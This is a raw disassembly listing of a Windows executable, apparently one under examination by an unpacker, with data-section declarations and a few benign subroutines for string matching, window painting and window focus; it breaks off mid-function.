dword_43AE7C dd 0 ; DATA XREF: sub_40981F+7B2�w
; sub_40A4AC+EC�r
dword_43AE80 dd 0 ; DATA XREF: sub_40981F:loc_40A0C1�w
; sub_40981F+8D1�w ...
dword_43AE84 dd 0 ; DATA XREF: sub_40981F+8CC�w
; sub_40A4AC+120�r
dword_43AE88 dd 0 ; DATA XREF: sub_40981F:loc_40A155�w
; sub_40A4AC:loc_40A5F8�r ...
dword_43AE8C dd 0 ; DATA XREF: sub_40981F+931�w
; sub_40A4AC+154�r
dword_43AE90 dd 0 ; DATA XREF: sub_40981F:loc_40A260�w
; sub_40A4AC:loc_40A62C�r ...
dword_43AE94 dd 0 ; DATA XREF: sub_40981F+A3C�w
; sub_40A4AC+188�r
dword_43AE98 dd 0 ; DATA XREF: sub_40981F:loc_40A2AA�w
; sub_40A4AC:loc_40A660�r
dword_43AE9C dd 0 ; DATA XREF: sub_40981F+A86�w
; sub_40A4AC+1BC�r
dword_43AEA0 dd 0 ; DATA XREF: sub_40981F:loc_40A2F4�w
; sub_40A4AC:loc_40A694�r
dword_43AEA4 dd 0 ; DATA XREF: sub_40981F+AD0�w
; sub_40A4AC+1F0�r
dword_43AEA8 dd 0 ; DATA XREF: sub_40981F:loc_40A368�w
; sub_40A4AC:loc_40A6C8�r
dword_43AEAC dd 0 ; DATA XREF: sub_40981F+B44�w
; sub_40A4AC+224�r
dword_43AEB0 dd 0 ; DATA XREF: sub_40981F:loc_40A3B2�w
; sub_40A4AC:loc_40A6FC�r
dword_43AEB4 dd 0 ; DATA XREF: sub_40981F+B8E�w
; sub_40A4AC+258�r
dword_43AEB8 dd 0 ; DATA XREF: sub_40981F:loc_40A450�w
; sub_40A4AC:loc_40A730�r
dword_43AEBC dd 0 ; DATA XREF: sub_40981F+C2C�w
; sub_40A4AC+28C�r
dword_43AEC0 dd 0 ; DATA XREF: sub_40981F:loc_40A49A�w
; sub_40A4AC:loc_40A764�r
dword_43AEC4 dd 0 ; DATA XREF: sub_40981F+C76�w
; sub_40A4AC+2C0�r
dword_43AEC8 dd 81h dup(0) ; DATA XREF: sub_40AA35+6A�o
dword_43B0CC dd 5 dup(0) ; DATA XREF: sub_40AEE0+32�o
dword_43B0E0 dd 0 ; DATA XREF: sub_40B328:loc_40B349�r
; sub_40B417+54�r ...
dword_43B0E4 dd 0 ; DATA XREF: sub_40B328�r
; sub_40B417+37�r ...
dword_43B0E8 dd 0 ; DATA XREF: sub_40B358+1A�r
; sub_40B56C+83�o
dword_43B0EC dd 0 ; DATA XREF: sub_40B328:loc_40B33C�r
; sub_40B56C+11B�w
dword_43B0F0 dd 0Dh dup(0) ; DATA XREF: sub_40B417+13�o
; sub_40B56C:loc_40B6A9�o
dword_43B124 dd 0 ; DATA XREF: sub_40B417+CD�r
; sub_40B417+EC�r ...
dd 0
dword_43B12C dd 0Eh dup(0) ; DATA XREF: sub_40B721+47�o
dword_43B164 dd 1000h dup(0) ; DATA XREF: sub_40BF6D+1D�o
; sub_40C00D�o ...
dword_43F164 dd 0 ; DATA XREF: sub_40BF6D+13�o
; sub_40C00D+E�o ...
dword_43F168 dd 0Eh dup(0) ; DATA XREF: sub_40D01A+F�o
dword_43F1A0 dd 2 dup(0) ; DATA XREF: sub_40D3A5+C8�o
dword_43F1A8 dd 17h dup(0) ; DATA XREF: sub_40D835:loc_40D952�o
; sub_40D835+131�o ...
dword_43F204 dd 80h dup(0) ; DATA XREF: sub_40E5EB+7C�o
; sub_40E5EB+A5�o
dword_43F404 dd 0 ; DATA XREF: sub_40DBB0+45�w
; sub_40DBB0+4D�r ...
dword_43F408 dd 17h dup(0) ; DATA XREF: sub_40E4B7:loc_40E5D9�o
; sub_40E4B7+12D�o
dword_43F464 dd 80h dup(0) ; DATA XREF: sub_40DAF0+4C�o
; sub_40DAF0+7E�o ...
byte_43F664 db 0 ; DATA XREF: sub_40DBB0+29�r
; sub_40DBB0+34�w
align 4
dword_43F668 dd 80h dup(0) ; DATA XREF: sub_40DE07+61�o
; sub_40DE07+89�o ...
dword_43F868 dd 82h dup(0) ; DATA XREF: sub_40D719:loc_40D751�o
; sub_40D719+5B�o
dword_43FA70 dd 0 ; DATA XREF: sub_40BE75+A�o
; sub_40BE75+44�r ...
dd 5 dup(0)
dword_43FA88 dd 0 ; DATA XREF: sub_40BE75+60�r
; sub_40EE72+BD6�r
dd 2D9h dup(0)
dword_4405F0 dd 0 ; DATA XREF: sub_407767+A8�r
; sub_40BE75+2D�o ...
dd 7Fh dup(0)
dword_4407F0 dd 0 ; DATA XREF: sub_416D5C+41�w
; sub_416E97+40�w ...
dword_4407F4 dd 0 ; DATA XREF: sub_4060D0+23B�w
; sub_407767:loc_4077AE�r ...
dword_4407F8 dd 0 ; DATA XREF: sub_40B56C+164�w
; sub_416810+AE�w ...
dword_4407FC dd 0 ; DATA XREF: sub_402688+E0�w
; sub_405AF2+7E�w ...
dword_440800 dd 0 ; DATA XREF: sub_407D66+11E�w
; sub_407F4D+53�r ...
dword_440804 dd 0 ; DATA XREF: sub_4060D0+268�w
; sub_407252+122�w ...
byte_440808 db 0 ; DATA XREF: sub_40EB92+91�o
; sub_40EE72+3357�r ...
align 4
dd 13D1h dup(0)
dword_445750 dd 6A2Ch dup(0) ; DATA XREF: _2:off_42A2D0�o
dword_460000 dd 0C017h dup(0) ; DATA XREF: _4:004D5B4C�o
dword_49005C dd 0F565h dup(0) ; DATA XREF: _2:off_427B6C�o
dword_4CD5F0 dd 1Bh ; DATA XREF: sub_407110:loc_40717E�r
; sub_40E6A9+3A�w ...
align 8
dword_4CD5F8 dd 0 ; DATA XREF: sub_40E6A9:loc_40EAA4�o
dword_4CD5FC dd 20h dup(0) ; DATA XREF: sub_40E6A9+393�o
; sub_40E6A9+44C�o ...
dword_4CD67C dd 10h dup(0) ; DATA XREF: sub_40E6A9+3AA�o
; sub_40EE72+929�o
dword_4CD6BC dd 24h dup(0) ; DATA XREF: sub_40E6A9+3C1�o
dword_4CD74C dd 0 ; DATA XREF: sub_40E6A9+3B5�w
; sub_40E6A9+463�w ...
dword_4CD750 dd 0 ; DATA XREF: sub_40E6A9+3D4�w
align 10h
dword_4CD760 dd 0 ; DATA XREF: sub_40EB92+72�r
; sub_40EE72+273�r
align 8
byte_4CD768 db 0 ; DATA XREF: sub_40ECFA+28�r
; sub_40ECFA+30�o
align 4
dword_4CD76C dd 0 ; DATA XREF: sub_40E6A9+400�w
; sub_40E6A9+417�r ...
dword_4CD770 dd 0 ; DATA XREF: sub_40E6A9+398�w
; sub_40EE72+8CA�r
dd 2 dup(0)
dword_4CD77C dd 0 ; DATA XREF: sub_415480+146�r
dd 0
dword_4CD784 dd 1Bh dup(0) ; DATA XREF: sub_415D6A+8D�o
dword_4CD7F0 dd 0 ; DATA XREF: sub_416FA4+16�o
; sub_416FC3+19�o
dword_4CD7F4 dd 65h dup(0) ; DATA XREF: sub_416F57+3D�o
byte_4CD988 db 0 ; DATA XREF: sub_416C55+6A�r
; sub_416C55+98�w
align 4
dd 2 dup(0)
dword_4CD994 dd 0 ; DATA XREF: sub_417D73+A�w
dword_4CD998 dd 0 ; DATA XREF: sub_4186B1+5E�r
; sub_4186B1+A4�w
align 10h
word_4CD9A0 dw 0 ; DATA XREF: sub_4186B1+55�r
; sub_4186B1+9A�o
word_4CD9A2 dw 0 ; DATA XREF: sub_4186B1+48�r
db 2 dup(0)
word_4CD9A6 dw 0 ; DATA XREF: sub_4186B1+3B�r
word_4CD9A8 dw 0 ; DATA XREF: sub_4186B1+2E�r
word_4CD9AA dw 0 ; DATA XREF: sub_4186B1+21�r
align 10h
dword_4CD9B0 dd 0 ; DATA XREF: sub_418B6E+3B�r
; sub_418B6E+91�w
dword_4CD9B4 dd 0 ; DATA XREF: sub_418833+1B9�w
; sub_418D0E:loc_418D8A�w ...
dword_4CD9B8 dd 0 ; DATA XREF: sub_4197F9+35�w
; sub_41A6B7:loc_41A751�w ...
dword_4CD9BC dd 0 ; DATA XREF: sub_41FEC6+13A�r
dword_4CD9C0 dd 0A28h ; DATA XREF: _0:00419C36�w
dword_4CD9C4 dd 501h ; DATA XREF: _0:00419C2D�w
dword_4CD9C8 dd 5 ; DATA XREF: _0:00419C22�w
dword_4CD9CC dd 1 ; DATA XREF: _0:00419C14�w
dword_4CD9D0 dd 1 ; DATA XREF: sub_40E6A9:loc_40E98C�r
; sub_41F240+91�w
dword_4CD9D4 dd 0A70B20h ; DATA XREF: sub_40E6A9+2EC�r
; sub_40E6A9+30C�r ...
dd 0
dword_4CD9DC dd 0A70B48h ; DATA XREF: sub_41F187+44�w
; sub_421DAE+9�r ...
dword_4CD9E0 dd 0 ; DATA XREF: sub_422492+36�r
dword_4CD9E4 dd 0 ; DATA XREF: sub_421DAE+16�r
; sub_42217C+4�r ...
dd 0
off_4CD9EC dd offset aCM_unpackerPac ; DATA XREF: sub_41F240+2E�w
; "C:\\m_unpacker\\packed.exe"
dd 0
byte_4CD9F4 db 0 ; DATA XREF: sub_419B07+2D�w
; sub_41FAE7+5�r
align 4
dword_4CD9F8 dd 0 ; DATA XREF: sub_419B07+27�w
dword_4CD9FC dd 0 ; DATA XREF: sub_419B07+4�r
; sub_419B07+8B�w
dword_4CDA00 dd 0 ; DATA XREF: _0:00419C68�w
; sub_41F187:loc_41F199�r ...
align 8
dword_4CDA08 dd 0 ; DATA XREF: sub_419CDA�r sub_419CFF�r ...
dword_4CDA0C dd 0 ; DATA XREF: sub_41A8A2+37�r
dd 0
dword_4CDA14 dd 0 ; DATA XREF: sub_417B89�r
; sub_41944F:loc_41956B�r ...
dword_4CDA18 dd 0 ; DATA XREF: sub_41AB54�r
dword_4CDA1C dd 0 ; DATA XREF: sub_41BA22+4B�w
; sub_41BB3B+2D�w ...
dword_4CDA20 dd 0 ; DATA XREF: sub_41C96D+11�r
; sub_41CA71+1A�r ...
byte_4CDA24 db 0 ; DATA XREF: sub_41C96D+3�r
; sub_41C96D+98�r ...
align 4
dword_4CDA28 dd 0 ; DATA XREF: sub_41CA71+11�r
; sub_41CB4F+21�w ...
byte_4CDA2C db 0 ; DATA XREF: sub_41CB4F+51�w
align 10h
dword_4CDA30 dd 0 ; DATA XREF: sub_41CD45+4E�r
; sub_41D120+3A�r ...
dword_4CDA34 dd 0 ; DATA XREF: sub_41CD45+5C�r
; sub_41D120+43�r ...
dword_4CDA38 dd 0 ; DATA XREF: sub_417FFA+7A�r
; sub_41CEEC+5�r
dword_4CDA3C dd 0 ; DATA XREF: sub_41D4FC+29�r
dword_4CDA40 dd 2 dup(0) ; DATA XREF: sub_418790+C�o
dword_4CDA48 dd 0 ; DATA XREF: sub_419063+4�r
; sub_419063+6E�r ...
dd 3 dup(0)
dword_4CDA58 dd 0 ; DATA XREF: sub_4199B9+61�r
; sub_4199B9+BF�r ...
align 10h
dword_4CDA60 dd 1 ; DATA XREF: sub_41E709+28�r
; sub_41E709+4C�w ...
dword_4CDA64 dd 1 ; DATA XREF: sub_41E92D:loc_41EAA8�r
; sub_41EAC6+4�w ...
dword_4CDA68 dd 0 ; DATA XREF: sub_41EFAB+3A�r
; sub_41EFAB+46�w ...
aCM_unpackerPac db 'C:\m_unpacker\packed.exe',0 ; DATA XREF: sub_41F240:loc_41F257�o
; _2:off_4CD9EC�o
align 4
dd 3Ah dup(0)
dword_4CDB70 dd 1 ; DATA XREF: sub_41F48D+2�r
; sub_41F48D+23�w ...
dword_4CDB74 dd 0 ; DATA XREF: sub_41F84C+21�r
dword_4CDB78 dd 0 ; DATA XREF: sub_41A8A2:loc_41A8CB�w
; sub_41A96C+154�w ...
dword_4CDB7C dd 1 ; DATA XREF: sub_41FB63+26�r
; sub_41FB63:loc_41FBCD�w
dword_4CDB80 dd 0 ; DATA XREF: sub_41A96C+7�r
align 8
word_4CDB88 dw 0 ; DATA XREF: sub_42074B+1A�o
; sub_42074B+46�r
byte_4CDB8A db 0 ; DATA XREF: sub_42074B+39�r
align 4
dword_4CDB8C dd 7 dup(0) ; DATA XREF: sub_42074B+52�o
dword_4CDBA8 dd 0 ; DATA XREF: sub_42074B+40�w
; sub_42074B+5C�o
dword_4CDBAC dd 0 ; DATA XREF: sub_42074B+4D�w
dword_4CDBB0 dd 0 ; DATA XREF: sub_42074B+31�w
dword_4CDBB4 dd 0 ; DATA XREF: sub_42074B+52�w
dword_4CDBB8 dd 77C26E79h ; DATA XREF: sub_42086E:loc_420891�r
; sub_42086E+38�r ...
align 10h
dword_4CDBC0 dd 0 ; DATA XREF: sub_42094E+11�w
; sub_42094E+63�w ...
align 8
dword_4CDBC8 dd 0 ; DATA XREF: sub_42094E+33�o
; sub_42094E+46�r
dword_4CDBCC dd 10h dup(0) ; DATA XREF: sub_42094E+C1�o
word_4CDC0C dw 0 ; DATA XREF: sub_420BAC+A8�r
word_4CDC0E dw 0 ; DATA XREF: sub_42094E+54�r
; sub_420BAC+DB�r ...
word_4CDC10 dw 0 ; DATA XREF: sub_420BAC+CA�r
word_4CDC12 dw 0 ; DATA XREF: sub_420BAC+D3�r
; sub_420BAC:loc_420C9E�r
word_4CDC14 dw 0 ; DATA XREF: sub_420BAC+C0�r
word_4CDC16 dw 0 ; DATA XREF: sub_420BAC+B8�r
word_4CDC18 dw 0 ; DATA XREF: sub_420BAC+B0�r
word_4CDC1A dw 0 ; DATA XREF: sub_420BAC+9E�r
dword_4CDC1C dd 0 ; DATA XREF: sub_42094E+4B�r
dword_4CDC20 dd 10h dup(0) ; DATA XREF: sub_42094E+FB�o
word_4CDC60 dw 0 ; DATA XREF: sub_420BAC+46�r
word_4CDC62 dw 0 ; DATA XREF: sub_42094E:loc_4209C5�r
; sub_420BAC+78�r ...
word_4CDC64 dw 0 ; DATA XREF: sub_420BAC+67�r
word_4CDC66 dw 0 ; DATA XREF: sub_420BAC+70�r
; sub_420BAC:loc_420C30�r
word_4CDC68 dw 0 ; DATA XREF: sub_420BAC+5D�r
word_4CDC6A dw 0 ; DATA XREF: sub_420BAC+55�r
word_4CDC6C dw 0 ; DATA XREF: sub_420BAC+4D�r
word_4CDC6E dw 0 ; DATA XREF: sub_420BAC+3E�r
dword_4CDC70 dd 0 ; DATA XREF: sub_42094E+80�r
dword_4CDC74 dd 0 ; DATA XREF: sub_42094E+132�r
; sub_42094E:loc_420A9A�r ...
dword_4CDC78 dd 0 ; DATA XREF: sub_420939�r sub_420939+E�w
dword_4CDC7C dd 0 ; DATA XREF: sub_42105F+3�r
; sub_42105F+2E�w ...
dword_4CDC80 dd 0 ; DATA XREF: sub_42105F+43�w
; sub_42105F:loc_4210AE�r
dword_4CDC84 dd 0 ; DATA XREF: sub_42105F+4A�w
; sub_42105F+60�r
dword_4CDC88 dd 0 ; DATA XREF: sub_41FEC6+3F�r
dword_4CDC8C dd 0 ; DATA XREF: sub_421C3C:loc_421CA3�r
; sub_421C3C+6D�o
dword_4CDC90 dd 0 ; DATA XREF: sub_421C3C:loc_421C7A�r
; sub_421C3C+44�o
dword_4CDC94 dd 0 ; DATA XREF: sub_421C3C:loc_421C6D�r
; sub_421C3C+37�o
dword_4CDC98 dd 0 ; DATA XREF: sub_421C3C:loc_421C87�r
; sub_421C3C+51�o
align 10h
dword_4CDCA0 dd 0 ; DATA XREF: sub_4221EA+28�r
; sub_4221EA+48�w ...
dword_4CDCA4 dd 0 ; DATA XREF: sub_422C78+28�r
; sub_422C78+4C�w ...
dword_4CDCA8 dd 0 ; DATA XREF: sub_422F03+26�r
; sub_422F03:loc_422F6D�w
byte_4CDCAC db 1 ; DATA XREF: sub_40482C�r sub_40482C+9�w
align 10h
dword_4CDCB0 dd 0A71110h ; DATA XREF: sub_41A835:loc_41A846�r
; sub_41AADC+14�r ...
align 10h
dword_4CDCC0 dd 400h dup(0) ; DATA XREF: _2:off_436388�o
; _2:00436390�o
dword_4CECC0 dd 200h ; DATA XREF: sub_41A835+9�r
; sub_41A835+56�r ...
dd 7 dup(0)
dword_4CECE0 dd 0A70650h ; DATA XREF: sub_419D23+B1�r
; sub_41E248+75�r ...
dword_4CECE4 dd 3Fh dup(0) ; DATA XREF: sub_41F5BF+92�o
dword_4CEDE0 dd 20h ; DATA XREF: sub_41A6B7+8�r
; sub_41E321+C�r ...
dword_4CEDE4 dd 4E4h ; DATA XREF: sub_41E92D+14�r
; sub_41E92D+65�w ...
align 10h
dword_4CEDF0 dd 3 dup(0) ; DATA XREF: sub_41E92D+123�o
; sub_41E92D+171�o ...
dword_4CEDFC dd 0 ; DATA XREF: sub_41E92D+108�w
; sub_41E92D+15D�w ...
byte_4CEE00 db 0 ; DATA XREF: sub_41EB6C:loc_41EC78�w
; sub_41EB6C:loc_41EC95�w ...
align 4
dd 0Fh dup(0)
dd 63626100h, 67666564h, 6B6A6968h, 6F6E6D6Ch, 73727170h
dd 77767574h, 7A7978h, 0
dd 43424100h, 47464544h, 4B4A4948h, 4F4E4D4Ch, 53525150h
dd 57565554h, 5A5958h, 0
dd 83000000h, 0
dd 9A0000h, 9E009Ch, 2 dup(0)
dd 8A0000h, 0FF8E008Ch, 2 dup(0)
dd 0AA0000h, 2 dup(0)
dd 0B500h, 0BA0000h, 0
dd 0E3E2E1E0h, 0E7E6E5E4h, 0EBEAE9E8h, 0EFEEEDECh, 0F3F2F1F0h
dd 0F6F5F4h, 0FBFAF9F8h, 0DFFEFDFCh, 0C3C2C1C0h, 0C7C6C5C4h
dd 0CBCAC9C8h, 0CFCECDCCh, 0D3D2D1D0h, 0D6D5D4h, 0DBDAD9D8h
dd 9FDEDDDCh
byte_4CEF00 db 0 ; DATA XREF: sub_41E92D+5C�o
; sub_41E92D+AF�o ...
byte_4CEF01 db 0 ; DATA XREF: sub_4192B8+5D�r
; sub_41E92D+A0�w ...
align 4
dd 0Fh dup(0)
dd 10100000h, 6 dup(10101010h), 0
dd 20200000h, 6 dup(20202020h), 2 dup(0)
dd 20h, 10000000h, 10001000h, 2 dup(0)
dd 20000000h, 20002000h, 10h, 0
dd 20000000h, 2 dup(0)
dd 200000h, 20000000h, 0
dd 10101000h, 5 dup(10101010h), 10101000h, 10101010h, 6 dup(20202020h)
dd 20202000h, 20202020h, 20h
dword_4CF004 dd 0 ; DATA XREF: sub_41E92D+6E�w
; sub_41E92D+12B�w ...
dword_4CF008 dd 0 ; DATA XREF: sub_41AD41+3C�w
; sub_41B3E6+5�r ...
dword_4CF00C dd 0 ; DATA XREF: sub_41ADB4+23A�r
; sub_41ADB4+25A�r ...
dword_4CF010 dd 0 ; DATA XREF: sub_41AD41+31�w
; sub_41ADB4+311�w ...
dword_4CF014 dd 0 ; DATA XREF: sub_41AD41+21�w
; sub_41ADB4+22D�r ...
dword_4CF018 dd 0 ; DATA XREF: sub_41AD41+28�w
; sub_41AD89�r ...
dword_4CF01C dd 0 ; DATA XREF: sub_41AD41+15�w
; sub_41AD89+8�r ...
dword_4CF020 dd 0 ; DATA XREF: sub_417BC7+F�r
; sub_41944F+5C�r ...
dword_4CF024 dd 0A70000h ; DATA XREF: sub_417BC7+66�r
; sub_417C3B+5A�r ...
dword_4CF028 dd 1 ; DATA XREF: sub_417BC7�r sub_417C3B+C�r ...
dword_4CF02C dd 142340h ; DATA XREF: _0:00419C5E�w
; sub_41F12F+F�r ...
dword_4CF030 dd 1 ; DATA XREF: sub_41F187+AD�w
; sub_421DAE�r
dword_4CF034 dd 1 ; DATA XREF: sub_41ECF1�r
; sub_41ECF1+11�w ...
dword_4CF038 dd 0A7075Ch ; DATA XREF: sub_418603+13�r
; sub_418603:loc_418645�r ...
dword_4CF03C dd 0A70758h ; DATA XREF: sub_418603+1�r
; sub_418603+C�r ...
_2 ends
; Section 4. (virtual address 000D0000)
; Virtual size : 00000018 ( 24.)
; Section size in file : 00000018 ( 24.)
; Offset to raw data for section: 000D0000
; Flags E0000040: Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
_3 segment para public 'CODE' use32
assume cs:_3
;org 4D0000h
assume es:nothing, ss:nothing, ds:_0, fs:nothing, gs:nothing
dd 127h, 19Ch, 1DCh, 221h, 233h, 290h
_3 ends
; Section 5. (virtual address 000D1000)
; Virtual size : 00011ABF ( 72383.)
; Section size in file : 00011ABF ( 72383.)
; Offset to raw data for section: 000D1000
; Flags E0000040: Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
_4 segment para public 'CODE' use32
assume cs:_4
;org 4D1000h
assume es:nothing, ss:nothing, ds:_0, fs:nothing, gs:nothing
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D1000 proc near ; CODE XREF: sub_4D463E+84�p
; sub_4D494C+333�p ...
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4E32E0
push offset sub_4D154C
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 0Ch
push ebx
push esi
push edi
mov esi, ecx
mov [ebp+var_1C], esi
lea eax, [esi+10h]
push eax
call ds:dword_4E301C ;; RtlEnterCriticalSection
and [ebp+var_4], 0
push [ebp+arg_4]
push [ebp+arg_0]
mov ecx, esi
call sub_4E098E
or [ebp+var_4], 0FFFFFFFFh
call sub_4D1060
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 8
sub_4D1000 endp
; =============== S U B R O U T I N E =======================================
sub_4D105D proc near ; DATA XREF: _5:004E32E8�o
mov esi, [ebp-1Ch]
sub_4D105D endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4D1060 proc near ; CODE XREF: sub_4D1000+47�p
add esi, 10h
push esi
call ds:dword_4E3018 ;; RtlLeaveCriticalSection
retn
sub_4D1060 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D106B proc near ; CODE XREF: sub_4D4166+9B�p
; sub_4D4166+C4�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov edx, [ebp+arg_4]
push edi
test edx, edx
jz short loc_4D107D
mov edi, [ebp+arg_0]
test edi, edi
jnz short loc_4D1081
loc_4D107D: ; CODE XREF: sub_4D106B+9�j
xor eax, eax
jmp short loc_4D10D3
; ---------------------------------------------------------------------------
loc_4D1081: ; CODE XREF: sub_4D106B+10�j
cmp byte ptr [edx], 0
jnz short loc_4D108F
xor eax, eax
cmp [edi], al
setz al
jmp short loc_4D10D3
; ---------------------------------------------------------------------------
loc_4D108F: ; CODE XREF: sub_4D106B+19�j
push ebx
push esi
mov esi, offset dword_4E5BE4
mov eax, edi
loc_4D1098: ; CODE XREF: sub_4D106B+49�j
mov bl, [eax]
mov cl, bl
cmp bl, [esi]
jnz short loc_4D10BA
test cl, cl
jz short loc_4D10B6
mov bl, [eax+1]
mov cl, bl
cmp bl, [esi+1]
jnz short loc_4D10BA
inc eax
inc eax
inc esi
inc esi
test cl, cl
jnz short loc_4D1098
loc_4D10B6: ; CODE XREF: sub_4D106B+37�j
xor eax, eax
jmp short loc_4D10BF
; ---------------------------------------------------------------------------
loc_4D10BA: ; CODE XREF: sub_4D106B+33�j
; sub_4D106B+41�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_4D10BF: ; CODE XREF: sub_4D106B+4D�j
pop esi
pop ebx
test eax, eax
jnz short loc_4D10CA
mov edi, offset dword_4E5BE0
loc_4D10CA: ; CODE XREF: sub_4D106B+58�j
push edx
push edi
call sub_4D10D6
pop ecx
pop ecx
loc_4D10D3: ; CODE XREF: sub_4D106B+14�j
; sub_4D106B+22�j
pop edi
pop ebp
retn
sub_4D106B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D10D6 proc near ; CODE XREF: sub_4D106B+61�p
; sub_4D10D6+70�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ebx
mov ebx, [ebp+arg_0]
push esi
mov esi, [ebp+arg_4]
mov al, [ebx]
push edi
test al, al
jz short loc_4D1120
loc_4D10E8: ; CODE XREF: sub_4D10D6+48�j
movsx edi, byte ptr [esi]
movsx eax, al
inc ebx
cmp eax, 2Ah
jz short loc_4D1130
cmp eax, 3Fh
jz short loc_4D1115
push eax
call sub_4D186E
mov edx, eax
push edi
mov [ebp+arg_4], edx
call sub_4D186E
pop ecx
pop ecx
mov ecx, [ebp+arg_4]
cmp eax, ecx
jnz short loc_4D112C
jmp short loc_4D1119
; ---------------------------------------------------------------------------
loc_4D1115: ; CODE XREF: sub_4D10D6+21�j
test edi, edi
jz short loc_4D112C
loc_4D1119: ; CODE XREF: sub_4D10D6+3D�j
mov al, [ebx]
inc esi
test al, al
jnz short loc_4D10E8
loc_4D1120: ; CODE XREF: sub_4D10D6+10�j
xor eax, eax
cmp [esi], al
setz al
loc_4D1127: ; CODE XREF: sub_4D10D6+58�j
; sub_4D10D6+86�j
pop edi
pop esi
pop ebx
pop ebp
retn
; ---------------------------------------------------------------------------
loc_4D112C: ; CODE XREF: sub_4D10D6+3B�j
; sub_4D10D6+41�j ...
xor eax, eax
jmp short loc_4D1127
; ---------------------------------------------------------------------------
loc_4D1130: ; CODE XREF: sub_4D10D6+1C�j
xor edi, edi
cmp byte ptr [esi], 0
jz short loc_4D1142
loc_4D1137: ; CODE XREF: sub_4D10D6+66�j
inc edi
cmp byte ptr [edi+esi], 0
jnz short loc_4D1137
test edi, edi
jl short loc_4D112C
loc_4D1142: ; CODE XREF: sub_4D10D6+5F�j
add esi, edi
loc_4D1144: ; CODE XREF: sub_4D10D6+7F�j
push esi
push ebx
call sub_4D10D6
pop ecx
test eax, eax
pop ecx
jnz short loc_4D1159
dec edi
dec esi
test edi, edi
jge short loc_4D1144
jmp short loc_4D112C
; ---------------------------------------------------------------------------
loc_4D1159: ; CODE XREF: sub_4D10D6+79�j
push 1
pop eax
jmp short loc_4D1127
sub_4D10D6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D115E proc near ; DATA XREF: sub_4D1271+36�o
var_60 = dword ptr -60h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 60h
push edi
cmp [ebp+arg_4], 0Fh
jnz loc_4D11FF
and [ebp+var_20], 0
xor eax, eax
lea edi, [ebp+var_1C]
stosd
stosd
stosd
stosd
stosd
lea eax, [ebp+var_20]
push eax
push 18h
push ds:dword_4EAA50
call ds:dword_4E67F8 ;; GetObjectA
lea eax, [ebp+var_60]
push eax
push [ebp+arg_0]
call ds:dword_4E67F0 ;; BeginPaint
push [ebp+var_60]
call ds:dword_4E67E0 ;; CreateCompatibleDC
mov [ebp+var_8], eax
push ds:dword_4EAA50
push [ebp+var_8]
call ds:dword_4E67FC ;; SelectObject
mov [ebp+var_4], eax
push 0CC0020h
push 0
push 0
push [ebp+var_8]
push [ebp+var_18]
push [ebp+var_1C]
push 0
push 0
push [ebp+var_60]
call ds:dword_4E6804 ;; BitBlt
push [ebp+var_4]
push [ebp+var_8]
call ds:dword_4E67FC ;; SelectObject
push [ebp+var_8]
call ds:dword_4E67E8 ;; DeleteDC
lea eax, [ebp+var_60]
push eax
push [ebp+arg_0]
call ds:dword_4E67F4 ;; EndPaint
xor eax, eax
jmp short loc_4D1211
; ---------------------------------------------------------------------------
loc_4D11FF: ; CODE XREF: sub_4D115E+B�j
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_4E3050 ;; DefWindowProcA
loc_4D1211: ; CODE XREF: sub_4D115E+9F�j
pop edi
leave
retn 10h
sub_4D115E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D1216 proc near ; DATA XREF: sub_4D1271+152�o
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
lea eax, [ebp+var_4]
push eax
push [ebp+arg_0]
call ds:dword_4E6808 ;; GetWindowThreadProcessId
call ds:dword_4E66E8 ;; GetCurrentProcessId
cmp [ebp+var_4], eax
jnz short loc_4D126A
mov eax, [ebp+arg_0]
cmp eax, ds:dword_4EAA54
jz short loc_4D126A
push ds:dword_4EAA54
call ds:dword_4E682C ;; DestroyWindow
and ds:dword_4EAA54, 0
push [ebp+arg_0]
call ds:dword_4E680C ;; SetActiveWindow
push [ebp+arg_0]
call ds:dword_4E6810 ;; SetForegroundWindow
xor eax, eax
jmp short locret_4D126D
; ---------------------------------------------------------------------------
loc_4D126A: ; CODE XREF: sub_4D1216+1E�j
; sub_4D1216+29�j
push 1
pop eax
locret_4D126D: ; CODE XREF: sub_4D1216+52�j
leave
retn 8
sub_4D1216 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D1271 proc near ; DATA XREF: sub_4D13F3+3C�o
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 58h
push edi
mov eax, [ebp+arg_0]
mov ds:dword_4EAA50, eax
and [ebp+var_38], 0
xor eax, eax
lea edi, [ebp+var_34]
stosd
stosd
stosd
stosd
